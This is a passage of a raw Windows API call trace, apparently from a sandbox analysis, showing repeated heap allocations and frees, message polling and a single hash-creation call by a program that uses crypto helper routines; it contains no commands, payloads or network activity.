RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.855] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.855] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.856] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.856] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.856] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.857] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.857] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.857] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51d00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0264.858] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0264.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0264.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0264.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0264.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0264.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55068, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.864] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 